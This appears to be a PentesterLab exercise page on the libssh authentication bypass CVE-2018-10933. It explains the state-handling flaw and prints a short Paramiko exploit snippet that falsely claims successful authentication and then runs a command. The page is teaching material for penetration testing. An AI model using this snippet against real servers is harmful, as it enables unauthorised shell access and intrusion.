CVE-2018-10933: LibSSH auth bypass
This exercise covers how one can bypass the authentication of an SSH server based on libssh to gain a shell on the impacted system
This course details the exploitation of the LibSSH authentication bypass: CVE-2018-10933 and how an attacker can use it to run commands on the underlying OS. It can also be used for port redirection in order to gain access to internal systems.
The issue comes from the way libssh doesn't maintain state for the authentication and how this can be used to bypass the authentication. Basically, think of the connection as a multi-step process:
step3... Since libssh doesn't enforce the order of the steps, you can basically jump to
step3 without going through
Interestingly, the same issue was found in the SSH library Paramiko earlier: CVE-2018-7750.
Finally, this code is based on the example code
examples/ssh_server_fork.c that requires to be "backdoored" to work properly as the actual code is keeping state...
There are plenty of exploits available in the wild, most of them rely on the Paramiko library and are very short. The most important part of the code looks something like:
sock = socket.socket() try: sock.connect((str(hostname), int(port))) message = paramiko.message.Message() transport = paramiko.transport.Transport(sock) transport.start_client() message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS) transport._send_message(message) cmd = transport.open_session() cmd.exec_command("uname")
You connect to the
victim using a
socket based on the
port, then you wrap
paramiko around the socket. Then, you can send the message telling the server that you are successfully authenticated. Finally, you can send the command you want to run (
uname in the code above).
This exercise showed you how to exploit the bug libssh authentication bypass (aka CVE-2018-10933). I hope you enjoyed learning with PentesterLab.